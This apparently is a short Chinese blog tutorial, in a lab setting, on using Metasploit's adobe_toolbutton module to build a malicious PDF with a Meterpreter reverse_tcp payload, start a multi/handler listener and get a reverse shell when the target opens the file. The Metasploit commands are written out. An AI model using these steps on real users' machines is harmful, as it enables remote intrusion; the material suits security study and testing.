对客户端攻击：adobe_toolbutton

漏洞简介

远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。

对客户端攻击：adobe_toolbutton

实践过程

输入命令use exploit/windows/fileformat/adobe_toolbutton使用该模块，然后使用set payload windows/meterpreter/reverse_tcp设置回连，show options检查设置信息并补全，最后exploit生成文件，文件在显示的目录下：

对客户端攻击：adobe_toolbutton

建立监听use exploit/multi/handler，set payload windows/meterpreter/reverse_tcp，然后exploit开启监听，同时在靶机点开pdf：

对客户端攻击：adobe_toolbutton

可以看到回连成功

相关文章：

猜你喜欢

相关资源

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode